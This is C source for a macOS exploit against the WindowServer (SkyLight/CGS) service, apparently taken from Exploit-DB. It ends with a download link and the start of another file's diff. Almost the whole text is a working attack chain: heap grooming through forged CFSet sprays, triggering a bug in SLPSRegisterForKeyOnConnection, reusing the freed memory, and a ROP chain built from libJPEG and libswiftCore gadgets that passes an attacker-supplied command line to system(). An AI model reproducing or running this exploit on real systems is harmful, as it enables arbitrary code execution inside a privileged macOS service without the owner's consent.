ENFORCE(strlen(argv[1]) < 0x1000 - 0x600, fail);
timed_log("[+] Resolving symbols...\n");
ENFORCE(resolve_symbols() == 0, fail);
timed_log("[+] Building our ROP chain...\n");
ENFORCE(build_rop_spray(&rop_spray, argv[1]) == 0, fail);
timed_log("[+] Creating a fresh connection...\n");
ENFORCE(SLSNewConnection(0, &connection_id) == 0, fail);
timed_log("[+] Setup 'hooks'...\n");
ENFORCE(setup_hooks(connection_id) == 0, fail);
timed_log("[+] Making holes (des p'tits trous, des p'tits trous, toujours des p'tit trous : https://www.youtube.com/watch?v=HsX4M-by5OY)...\n");
ENFORCE(massage_heap(connection_id) == 0, fail);
// no timed_log, we want to be fast :)
ENFORCE(register_application(connection_id) == 0, fail);
free_application = true;
timed_log("[+] Application registered...\n");
timed_log("[+] Triggering the bug\n");
ENFORCE(trigger_the_bug(connection_id) == 0, fail);
timed_log("[+] Let's free and reuse the application...\n");
// this will whack the application
free_application = false;
ENFORCE(reuse_allocation(connection_id) == 0, fail);
timed_log("[+] Trigger the UAF...\n");
ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, "SPRAY", rop_spray, ROP_SPRAY_SIZE, true) == KERN_SUCCESS, fail);
// the kernel freed the pages for us :)
rop_spray = NULL;
// a last synchronised request to make sure our command has been executed...
ENFORCE(SLPSRegisterForKeyOnConnection(connection_id, &(ProcessSerialNumber){0, 0}, 8, 1) == -50, fail);
// don't leave any connections behind us...
ENFORCE(SLSReleaseConnection(connection_id) == 0, fail);
connection_id = -1;
timed_log("[+] OK\n");
return 0;
// fail is the label of choice when coding Apple exploit :) (cf. CVE-2014-1266)
fail:
if (free_application)
{
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x12340000;
_CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id);
}
if (connection_id != -1)
SLSReleaseConnection(connection_id);
if (rop_spray != NULL)
mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)rop_spray, ROP_SPRAY_SIZE);
return 1;
}
static int resolve_symbols()
{
SLSNewConnection = dlsym(RTLD_DEFAULT, "SLSNewConnection");
ENFORCE(SLSNewConnection != NULL, fail);
SLPSRegisterForKeyOnConnection = dlsym(RTLD_DEFAULT, "SLPSRegisterForKeyOnConnection");
ENFORCE(SLPSRegisterForKeyOnConnection != NULL, fail);
SLSReleaseConnection = dlsym(RTLD_DEFAULT, "SLSReleaseConnection");
ENFORCE(SLSReleaseConnection != NULL, fail);
SLSServerPort = dlsym(RTLD_DEFAULT, "SLSServerPort");
ENFORCE(SLSServerPort != NULL, fail);
// ugly but we could find its address by parsing private symbols, we just don't want to waste our time coding it...
ENFORCE(((uintptr_t)SLPSRegisterForKeyOnConnection & 0xFFF) == (SLPSRegisterForKeyOnConnection_OFFSET & 0xFFF), fail);
CGSGetConnectionPortById = (void *)((uint8_t*)SLPSRegisterForKeyOnConnection - SLPSRegisterForKeyOnConnection_OFFSET + CGSGetConnectionPortById_OFFSET);
// paranoid checks, check if function starts with push rbp / mov rbp, rsp
ENFORCE(memcmp(CGSGetConnectionPortById, "\x55\x48\x89\xe5", 4) == 0, fail);
return 0;
fail:
return -1;
}
// the trick is here to map multiple times the same page to make a HUGE alloc that doesn't use a lot of physical memory
static int build_rop_spray(void **rop_spray, char *command_line)
{
void *handle_libswiftCore = NULL;
void* large_region = NULL;
*rop_spray = NULL;
// first we reserve a large region
ENFORCE(mach_vm_allocate(mach_task_self(), (mach_vm_address_t *)&large_region, ROP_SPRAY_SIZE, VM_FLAGS_ANYWHERE) == KERN_SUCCESS, fail);
// then we allocate the first page
void *rop_chain = large_region;
ENFORCE(mach_vm_allocate(mach_task_self(), (mach_vm_address_t *)&rop_chain, 0x1000, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE) == KERN_SUCCESS, fail);
// now we can construct our rop chain
void *release_selector = NSSelectorFromString(@"release");
ENFORCE(release_selector != NULL, fail);
// + 0x530 because of our forged CFSet and its 1st hash table entry (=0x200002537)
BYTE(rop_chain, 0x530 + 0x20) = 0; // flags
DWORD(rop_chain, 0x530 + 0x18) = 0; // mask
QWORD(rop_chain, 0x530 + 0x10) = SPRAYED_BUFFER_ADDRESS; // cache address
QWORD(rop_chain, 0) = (uint64_t)release_selector; // selector
// and now the """fun""" part...
handle_libswiftCore = dlopen("/System/Library/PrivateFrameworks/Swift/libswiftCore.dylib", RTLD_GLOBAL | RTLD_NOW);
ENFORCE(handle_libswiftCore != NULL, fail);
void *libJPEG_text_addr;
size_t libJPEG_text_size;
ENFORCE(find_dylib_text_section("/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib", &libJPEG_text_addr, &libJPEG_text_size) == 0, fail);
void *libswiftCore_text_addr;
size_t libswiftCore_text_size;
ENFORCE(find_dylib_text_section("/System/Library/PrivateFrameworks/Swift/libswiftCore.dylib", &libswiftCore_text_addr, &libswiftCore_text_size) == 0, fail);
uintptr_t system_address = (uintptr_t)dlsym(RTLD_DEFAULT, "system");
ENFORCE(system_address != 0, fail);
// check our gadgets
uintptr_t save_rbp_set_rax = (uintptr_t)memmem(libJPEG_text_addr, libJPEG_text_size, SAVE_RBP_SET_RAX_GADGET, sizeof(SAVE_RBP_SET_RAX_GADGET));
ENFORCE(save_rbp_set_rax != 0, fail);
uintptr_t set_rsi = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, SET_RSI_GADGET, sizeof(SET_RSI_GADGET));
ENFORCE(set_rsi != 0, fail);
uintptr_t set_rdi = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, SET_RDI_GADGET, sizeof(SET_RDI_GADGET));
ENFORCE(set_rdi != 0, fail);
uintptr_t pop_rbp_jmp = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, POP_RBP_JMP_GADGET, sizeof(POP_RBP_JMP_GADGET));
ENFORCE(pop_rbp_jmp != 0, fail);
ENFORCE(dlclose(handle_libswiftCore) == 0, fail);
handle_libswiftCore = NULL;
timed_log("[i] Pivot address: 0x%lX\n", save_rbp_set_rax);
QWORD(rop_chain, 8) = save_rbp_set_rax; // pivot
// SAVE_RBP_SET_RAX: push rbp ; mov rbp, rsp ; mov rax, qword ptr [rdi + 8] ; xor esi, esi ; mov edx, 0x118 ; call qword ptr [rax]
// + 0x137 because of our forged CFSet and its 2nd hash table entry
QWORD(rop_chain, 0x137) = set_rsi;
// rax=0x200002137
// SET_RSI: mov rax, qword ptr [rax + 8] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi]
QWORD(rop_chain, 0x137+8) = SPRAYED_BUFFER_ADDRESS+0x240;
// rax=SPRAYED_BUFFER_ADDRESS+0x240
QWORD(rop_chain, 0x240) = SPRAYED_BUFFER_ADDRESS+0x248;
// rsi=SPRAYED_BUFFER_ADDRESS+0x248
QWORD(rop_chain, 0x248) = set_rdi;
// SET_RDI: mov rdi, qword ptr [rsi + 0x30] ; mov rax, qword ptr [rsi + 0x38] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi]
QWORD(rop_chain, 0x248+0x30) = SPRAYED_BUFFER_ADDRESS+0x600;
// rdi=SPRAYED_BUFFER_ADDRESS+0x500
QWORD(rop_chain, 0x248+0x38) = SPRAYED_BUFFER_ADDRESS+0x248+0x38+8;
// rax=SPRAYED_BUFFER_ADDRESS+0x288
QWORD(rop_chain, 0x288) = SPRAYED_BUFFER_ADDRESS+0x288+8;
// rsi=SPRAYED_BUFFER_ADDRESS+0x290
QWORD(rop_chain, 0x290) = pop_rbp_jmp;
for (uint32_t i = 0; i < 4; i++)
{
// POP_RBP_JMP: mov rax, qword ptr [rsi + 0x10] ; mov rsi, qword ptr [rax + 0x20] ; mov rax, qword ptr [rsi - 8] ; mov rax, qword ptr [rax] ; pop rbp ; jmp rax
QWORD(rop_chain, i*0x48+0x290+0x10) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x290+0x10+8;
// rax=SPRAYED_BUFFER_ADDRESS+0x2A8
QWORD(rop_chain, i*0x48+0x2A8+0x20) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x2A8+0x20+8+8;
// rsi=SPRAYED_BUFFER_ADDRESS+0x2D8
QWORD(rop_chain, i*0x48+0x2D8-8) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x2A8+0x20+8+8;
// rax=SPRAYED_BUFFER_ADDRESS+0x2D8
QWORD(rop_chain, i*0x48+0x2D8) = i == 3 ? system_address : pop_rbp_jmp;
// rax=SPRAYED_BUFFER_ADDRESS+0x2D80x600
}
strcpy((char *)&BYTE(rop_chain, 0x600), command_line);
QWORD(rop_chain, 0x1000-8) = 0xFFFFFFFF; // make sure that the server won't try to parse this...
// and duplicate it, we use two for loops to gain some time
for (uintptr_t i = 0x1000ul; i < 4*0x400*0x400; i += 0x1000ul)
{
mach_vm_address_t remapped_page_address = (mach_vm_address_t)large_region+i;
vm_prot_t protection = VM_PROT_READ;
kern_return_t kr;
kr = mach_vm_remap(
mach_task_self(),
&remapped_page_address,
0x1000,
0,
VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
mach_task_self(),
(mach_vm_address_t)rop_chain,
0,
&protection,
&protection,
VM_INHERIT_NONE
);
ENFORCE(kr == KERN_SUCCESS, fail);
ENFORCE(remapped_page_address == (mach_vm_address_t)large_region+i, fail);
}
for (uintptr_t i = 4*0x400*0x400; i < ROP_SPRAY_SIZE; i += 4*0x400*0x400)
{
mach_vm_address_t remapped_page_address = (mach_vm_address_t)large_region+i;
vm_prot_t protection = VM_PROT_READ;
kern_return_t kr;
kr = mach_vm_remap(
mach_task_self(),
&remapped_page_address,
4*0x400*0x400,
0,
VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
mach_task_self(),
(mach_vm_address_t)rop_chain,
0,
&protection,
&protection,
VM_INHERIT_NONE
);
ENFORCE(kr == KERN_SUCCESS, fail);
ENFORCE(remapped_page_address == (mach_vm_address_t)large_region+i, fail);
}
*rop_spray = large_region;
return 0;
fail:
if (handle_libswiftCore != NULL)
dlclose(handle_libswiftCore);
if (large_region != NULL)
mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)large_region, ROP_SPRAY_SIZE);
return -1;
}
size_t malloc_size(void *);
static int massage_heap(int connection_id)
{
static UInt8 data_buffer[0x70];
memset(data_buffer, 'A', 0x70);
CFDataRef hole_data = NULL;
CFNumberRef place_holder_number = NULL;
CFDataRef serialized_hole_0x60_data = NULL;
CFDataRef serialized_hole_0x70_data = NULL;
CFDataRef serialized_number_place_holder = NULL;
bool free_tmp_application = false;
hole_data = CFDataCreate(NULL, data_buffer, 0x60 - 0x40 - 0x20);
ENFORCE(hole_data != NULL, fail);
serialized_hole_0x60_data = CFPropertyListCreateData(NULL, hole_data, kCFPropertyListBinaryFormat_v1_0, 0, NULL);
ENFORCE(serialized_hole_0x60_data != NULL, fail);
CFRelease(hole_data);
hole_data = NULL;
hole_data = CFDataCreate(NULL, data_buffer, 0x70 - 0x40 - 0x20);
ENFORCE(hole_data != NULL, fail);
serialized_hole_0x70_data = CFPropertyListCreateData(NULL, hole_data, kCFPropertyListBinaryFormat_v1_0, 0, NULL);
ENFORCE(serialized_hole_0x70_data != NULL, fail);
CFRelease(hole_data);
hole_data = NULL;
uint64_t v = 0x1337BAB;
place_holder_number = CFNumberCreate(NULL, kCFNumberSInt64Type, &v);
ENFORCE(place_holder_number != NULL, fail);
serialized_number_place_holder = CFPropertyListCreateData(NULL, place_holder_number, kCFPropertyListBinaryFormat_v1_0, 0, NULL);
ENFORCE(serialized_number_place_holder != NULL, fail);
CFRelease(place_holder_number);
place_holder_number = NULL;
// now free the data to make holes :)
uint8_t *placeholder_data_bytes = (uint8_t *)CFDataGetBytePtr(serialized_number_place_holder);
size_t placeholder_data_size = CFDataGetLength(serialized_number_place_holder);
for (uint32_t i = 0; i < NB_CORE_SWITCH; i++)
{
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x6660000;
// help changing core...
ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), "a", true, connection_id) == KERN_SUCCESS, fail);
free_tmp_application = true;
for (uint32_t j = 0; j < NB_HOLES_PER_SWITCH; j++)
{
char key[20];
snprintf(key, sizeof(key), "MSSG_%4d_%4d", i, j);
CFDataRef data = j%2 == 0 ? serialized_hole_0x70_data : serialized_hole_0x60_data;
uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data);
size_t data_size = CFDataGetLength(data);
ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, data_bytes, data_size, false) == KERN_SUCCESS, fail);
snprintf(key, sizeof(key), "MSSH_%4d_%4d", i, j);
ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, placeholder_data_bytes, placeholder_data_size, false) == KERN_SUCCESS, fail);
}
ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail);
free_tmp_application = false;
}
CFRelease(serialized_number_place_holder);
serialized_number_place_holder = NULL;
CFRelease(serialized_hole_0x60_data);
serialized_hole_0x60_data = NULL;
CFRelease(serialized_hole_0x70_data);
serialized_hole_0x70_data = NULL;
for (uint32_t i = 0; i < NB_CORE_SWITCH; i++)
{
for (uint32_t j = 0; j < NB_HOLES_PER_SWITCH; j++)
{
char key[20];
snprintf(key, sizeof(key), "MSSG_%4d_%4d", i, j);
ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, NULL, 0, false) == KERN_SUCCESS, fail);
}
}
return 0;
fail:
if (hole_data != NULL)
CFRelease(hole_data);
if (serialized_hole_0x60_data != NULL)
CFRelease(serialized_hole_0x60_data);
if (serialized_hole_0x70_data != NULL)
CFRelease(serialized_hole_0x70_data);
if (place_holder_number != NULL)
CFRelease(place_holder_number);
if (serialized_number_place_holder != NULL)
CFRelease(serialized_number_place_holder);
if (free_tmp_application)
{
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x6660000;
_CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id);
}
return -1;
}
static int register_application(int connection_id)
{
ProcessSerialNumber psn;
bool free_application = false;
char app_name[0x40];
// app_name must be > 0x20 to not use the tiny holes reserved for CFSet and it must be big enough to fill the rest of the space left by the application
memset(app_name, 'B', sizeof(app_name)-1);
app_name[COUNT_OF(app_name)-1] = 0;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x12340000;
ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), app_name, true, connection_id) == KERN_SUCCESS, fail);
free_application = true;
// use a psn in the middle-end of our spray
psn.lowLongOfPSN = 0x12340000;
ENFORCE(_CGSSetAuxConn(connection_id, &psn) == 0, fail);
return 0;
fail:
if (free_application)
{
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x12340000;
_CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id);
}
return -1;
}
static int setup_hooks(int connection_id)
{
CFNumberRef set_array_values[35] = {NULL};
CFMutableArrayRef big_array = NULL;
CFDataRef data = NULL;
timed_log("[+] Forging our set...\n");
uint8_t set_hash_table[71] = {
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0, 1, 0, 1, 0, 1, 0, 1, 0, 1,
0
};
uint32_t set_size = 0;
uint64_t v = 0x400000001;
while (set_size < COUNT_OF(set_array_values))
{
CFNumberRef n;
n = CFNumberCreate(NULL, kCFNumberSInt64Type, &v);
ENFORCE(n != NULL, fail);
uint32_t h = CFHash(n)%71;
if (set_hash_table[h] == 1)
{
set_array_values[set_size] = n;
set_hash_table[h] = 0;
set_size ++;
}
else
{
CFRelease(n);
}
v++;
ENFORCE(v < 0x400000001 + 0xFFFFF, fail);
}
big_array = CFArrayCreateMutable(NULL, 0, &kCFTypeArrayCallBacks);
ENFORCE(big_array != NULL, fail);
timed_log("[+] Creating our big set array...\n");
for (uint32_t i = 0; i < CFSET_SPRAY_COUNT; i++)
{
CFArrayRef tmp_array = CFArrayCreate(NULL, (const void **)set_array_values, COUNT_OF(set_array_values), &kCFTypeArrayCallBacks);
ENFORCE(tmp_array != NULL, fail);
CFArrayAppendValue(big_array, tmp_array);
CFRelease(tmp_array);
}
for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++)
{
CFRelease(set_array_values[i]);
set_array_values[i] = NULL;
}
timed_log("[+] Serializing it...\n");
data = CFPropertyListCreateData(NULL, big_array, kCFPropertyListBinaryFormat_v1_0, 0, NULL);
ENFORCE(data != NULL, fail);
CFRelease(big_array);
big_array = NULL;
uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data);
size_t data_size = CFDataGetLength(data);
timed_log("[i] Serialized size: %ldMB\n", data_size / (1000*1000));
timed_log("[+] Patching it...\n");
uint32_t nb_arrays = 0;
uint32_t cursor = 0;
while (1)
{
uint8_t *position = memmem(&data_bytes[cursor], data_size-cursor, "\xAF\x10\x23", 3);
if (position == NULL)
break;
position[0] = 0xCF; // Array to Set
nb_arrays ++;
ENFORCE(nb_arrays <= CFSET_SPRAY_COUNT, fail);
cursor = (uint32_t)(position-data_bytes) + 3;
}
ENFORCE(nb_arrays == CFSET_SPRAY_COUNT, fail);
ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, "SPRAY", data_bytes, data_size, false) == KERN_SUCCESS, fail);
CFRelease(data);
data = NULL;
return 0;
fail:
for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++)
if (set_array_values[i] != NULL)
CFRelease(set_array_values[i]);
if (data != NULL)
CFRelease(data);
if (big_array != NULL)
CFRelease(big_array);
return -1;
}
static int trigger_the_bug(int connection_id)
{
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x12340000;
int32_t index = VULN_IDX;
int err;
while ((err = SLPSRegisterForKeyOnConnection(connection_id, &psn, index, 1)) != 0)
{
// ENFORCE((err == 1011) || (err == -600), fail);
ENFORCE(++index < VULN_IDX+((2*8*1024*1024)/0x18), fail); // = 2 small regions = 16 MiB
}
return 0;
fail:
return -1;
}
static int reuse_allocation(int connection_id)
{
CFNumberRef set_array_values[8] = {NULL};
CFMutableArrayRef big_array = NULL;
CFDataRef data = NULL;
bool free_tmp_application = false;
bool free_application = true;
timed_log("[+] Forging our set...\n");
uint8_t set_hash_table[13];
memset(set_hash_table, 1, sizeof(set_hash_table));
uint64_t v;
v = 0x2000025;
set_array_values[0] = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); // == 0x200002537 -> hash = 0
ENFORCE(CFHash(set_array_values[0])%COUNT_OF(set_hash_table) == 0, fail);
set_hash_table[0] = 0;
v = 0x2000021;
set_array_values[1] = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); // == 0x200002137; -> hash = 1
ENFORCE(CFHash(set_array_values[1])%COUNT_OF(set_hash_table) == 1, fail);
set_hash_table[1] = 0;
v = 0;
uint32_t set_size = 2;
while (set_size < COUNT_OF(set_array_values))
{
CFNumberRef n;
n = CFNumberCreate(NULL, kCFNumberSInt64Type, &v);
ENFORCE(n != NULL, fail);
uint32_t h = CFHash(n)%COUNT_OF(set_hash_table);
if (set_hash_table[h] == 1)
{
set_array_values[set_size] = n;
set_hash_table[h] = 0;
set_size ++;
}
else
{
CFRelease(n);
}
v++;
ENFORCE(v < 0xFFFFF, fail);
}
big_array = CFArrayCreateMutable(NULL, 0, &kCFTypeArrayCallBacks);
ENFORCE(big_array != NULL, fail);
timed_log("[+] Creating our big set array...\n");
for (uint32_t i = 0; i < NB_REUSE; i++)
{
CFArrayRef tmp_array = CFArrayCreate(NULL, (const void **)set_array_values, COUNT_OF(set_array_values), &kCFTypeArrayCallBacks);
ENFORCE(tmp_array != NULL, fail);
CFArrayAppendValue(big_array, tmp_array);
CFRelease(tmp_array);
}
for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++)
{
CFRelease(set_array_values[i]);
set_array_values[i] = NULL;
}
timed_log("[+] Serializing it...\n");
data = CFPropertyListCreateData(NULL, big_array, kCFPropertyListBinaryFormat_v1_0, 0, NULL);
ENFORCE(data != NULL, fail);
CFRelease(big_array);
big_array = NULL;
uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data);
size_t data_size = CFDataGetLength(data);
timed_log("[i] Serialized size: %ldMB\n", data_size / (1000*1000));
timed_log("[+] Patching it...\n");
uint32_t nb_arrays = 0;
uint32_t cursor = 0;
while (1)
{
uint8_t *position = memmem(&data_bytes[cursor], data_size-cursor, "\xA8\x02\x03", 3);
if (position == NULL)
break;
position[0] = 0xC8; // Array to Set
nb_arrays ++;
ENFORCE(nb_arrays <= NB_REUSE, fail);
cursor = (uint32_t)(position-data_bytes) + 3;
}
ENFORCE(nb_arrays == NB_REUSE, fail);
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x12340000;
ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail);
free_application = false;
for (uint32_t i = 0; i < 1000; i++)
{
char key[0x80];
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x56780000;
// help changing core...
ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), "a", true, connection_id) == KERN_SUCCESS, fail);
free_tmp_application = true;
// we use a long name to make sure it'll not be placed in our holes :)
snprintf(key, sizeof(key), "FAKE_OBJECT_WITH_A_VERY_LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONG_NAME_%d", i);
ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, data_bytes, data_size, false) == KERN_SUCCESS, fail);
ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail);
free_tmp_application = false;
usleep(10);
}
CFRelease(data);
data = NULL;
return 0;
fail:
if (free_application)
{
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x12340000;
_CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id);
}
if (free_tmp_application)
{
ProcessSerialNumber psn;
psn.highLongOfPSN = 0;
psn.lowLongOfPSN = 0x56780000;
_CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id);
}
for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++)
if (set_array_values[i] != NULL)
CFRelease(set_array_values[i]);
if (data != NULL)
CFRelease(data);
if (big_array != NULL)
CFRelease(big_array);
return -1;
}
static int find_dylib_text_section(const char *dylib_name, void **text_address, size_t *text_size)
{
uint32_t image_count = _dyld_image_count();
for (uint32_t i = 0; i < image_count; i++)
{
const char *current_dylib_name = _dyld_get_image_name(i);
ENFORCE(current_dylib_name != NULL, fail);
if (strcmp(current_dylib_name, dylib_name) != 0)
continue;
const struct mach_header_64 *dylib_header = (const struct mach_header_64 *)_dyld_get_image_header(i);
ENFORCE(dylib_header != NULL, fail);
ENFORCE(dylib_header->magic == MH_MAGIC_64, fail);
uint32_t max_size = dylib_header->sizeofcmds;
ENFORCE(max_size < 0x2000, fail);
struct load_command *load_command = (struct load_command *)(dylib_header+1);
struct load_command *next_command;
ENFORCE(dylib_header->ncmds < 0x100, fail);
for (uint32_t cmd_i = 0; cmd_i < dylib_header->ncmds; cmd_i++, load_command = next_command)
{
ENFORCE(load_command->cmdsize <= max_size, fail);
ENFORCE(load_command->cmdsize >= sizeof(struct load_command), fail);
next_command = (struct load_command *)((uintptr_t)load_command + load_command->cmdsize);
max_size -= load_command->cmdsize;
if (load_command->cmd != LC_SEGMENT_64)
continue;
ENFORCE(load_command->cmdsize >= sizeof(struct segment_command_64), fail);
struct segment_command_64 *segment_command_64 = (struct segment_command_64 *)load_command;
if (strcmp(segment_command_64->segname, "__TEXT") != 0)
continue;
struct section_64 *sections = (struct section_64 *)(segment_command_64 + 1);
ENFORCE(segment_command_64->nsects < 0x100, fail);
ENFORCE(load_command->cmdsize == sizeof(struct segment_command_64) + segment_command_64->nsects*sizeof(struct section_64), fail);
for (uint32_t sect_i = 0; sect_i < segment_command_64->nsects; sect_i++)
{
if (strcmp(sections[sect_i].sectname, "__text") != 0)
continue;
*text_address = (void *)(sections[sect_i].addr + _dyld_get_image_vmaddr_slide(i));
*text_size = sections[sect_i].size;
return 0;
}
}
}
fail:
return -1;
}
#pragma pack(push, 4)
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_ool_descriptor_t ool_serialized_value;
NDR_record_t NDR_record;
uint64_t connection_id;
uint32_t key_len;
char key[128];
uint32_t serialized_value_length;
} CGSSetConnectionProperty_message_t;
#pragma pack(pop)
static mach_msg_return_t _CGSSetConnectionProperty(mach_port_t connection_port, int connection_id, const char *key_value, const void *serialized_value, uint32_t serialized_value_length, bool deallocate)
{
CGSSetConnectionProperty_message_t msg;
memset(&msg, 0, sizeof(msg));
msg.body.msgh_descriptor_count = 1;
msg.ool_serialized_value.type = MACH_MSG_OOL_DESCRIPTOR;
msg.ool_serialized_value.address = (void *)serialized_value;
msg.ool_serialized_value.size = serialized_value_length;
msg.ool_serialized_value.deallocate = deallocate;
msg.ool_serialized_value.copy = MACH_MSG_VIRTUAL_COPY;
msg.NDR_record = NDR_record;
msg.connection_id = connection_id;
strncpy(msg.key, key_value, sizeof(msg.key));
msg.key_len = 127;
msg.serialized_value_length = serialized_value_length;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
msg.header.msgh_remote_port = connection_port;
msg.header.msgh_id = 29398;
kern_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0, 0, 0, 0);
return kr;
}
#pragma pack(push, 4)
typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_ool_descriptor_t ool_serialized_value;
NDR_record_t NDR_record;
uint32_t serialized_value_length;
} CGSSetPerUserConfigurationData_message_t;
#pragma pack(pop)
#pragma pack(push, 4)
typedef struct {
mach_msg_header_t header;
NDR_record_t NDR_record;
uint64_t process_serial_number;
uint32_t connection_id;
} CGSSetAuxConn_message_t;
#pragma pack(pop)
static mach_msg_return_t _CGSSetAuxConn(uint32_t connection_id, ProcessSerialNumber *process_serial_number)
{
CGSSetAuxConn_message_t msg;
memset(&msg, 0, sizeof(msg));
msg.connection_id = connection_id;
msg.process_serial_number = *(uint64_t *)process_serial_number;
msg.NDR_record = NDR_record;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, 0);
msg.header.msgh_remote_port = CGSGetConnectionPortById(connection_id);
msg.header.msgh_id = 29368;
return mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0, 0, 0, 0);
}
#pragma pack(push, 4)
typedef struct {
mach_msg_header_t header;
NDR_record_t NDR_record;
ProcessSerialNumber sn;
uint32_t session_id;
uint32_t session_attributes;
uint32_t unknown_2;
uint32_t pid;
uint32_t padding_1;
uint32_t app_name_len;
char app_name[128];
char multi_process;
uint32_t connection_id;
uint32_t padding_2;
} CGSCreateApplication_message_t;
typedef struct {
mach_msg_header_t header;
NDR_record_t NDR_record;
kern_return_t retcode;
} CGSCreateApplication_reply_t;
#pragma pack(pop)
static mach_msg_return_t _CGSCreateApplication(uint32_t connection_id, ProcessSerialNumber sn, uint32_t session_id, uint32_t session_attributes, uint32_t unknown_2, pid_t pid, char *app_name, char multi_process, uint32_t sent_connection_id)
{
CGSCreateApplication_message_t msg;
memset(&msg, 0, sizeof(msg));
msg.connection_id = connection_id;
msg.sn = sn;
msg.session_id = session_id;
msg.session_attributes = session_attributes;
msg.unknown_2 = unknown_2;
msg.pid = pid;
strncpy(msg.app_name, app_name, sizeof(msg.app_name));
msg.app_name_len = 127;
msg.multi_process = multi_process;
msg.connection_id = sent_connection_id;
msg.NDR_record = NDR_record;
msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
msg.header.msgh_remote_port = CGSGetConnectionPortById(connection_id);
msg.header.msgh_id = 29507;
msg.header.msgh_local_port = mig_get_reply_port();
mach_msg_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG|MACH_RCV_MSG, sizeof(msg), sizeof(msg), msg.header.msgh_local_port, 0, 0);
if (kr != KERN_SUCCESS)
{
switch (kr) {
case MACH_SEND_INVALID_DATA:
case MACH_SEND_INVALID_DEST:
case MACH_SEND_INVALID_HEADER:
mig_put_reply_port(msg.header.msgh_local_port);
break;
default:
mig_dealloc_reply_port(msg.header.msgh_local_port);
}
}
else
kr = ((CGSCreateApplication_reply_t *)&msg)->retcode;
return kr;
}
static void timed_log(char* format, ...)
{
char buffer[30];
struct tm* time_info;
time_t t = time(NULL);
time_info = localtime(&t);
strftime(buffer, 30, "%Y-%m-%d %H:%M:%S ", time_info);
fputs(buffer, stderr);
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
}
# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46428.zip

141
exploits/php/webapps/46429.txt Normal file
View file

@ -0,0 +1,141 @@
===========================================================================================
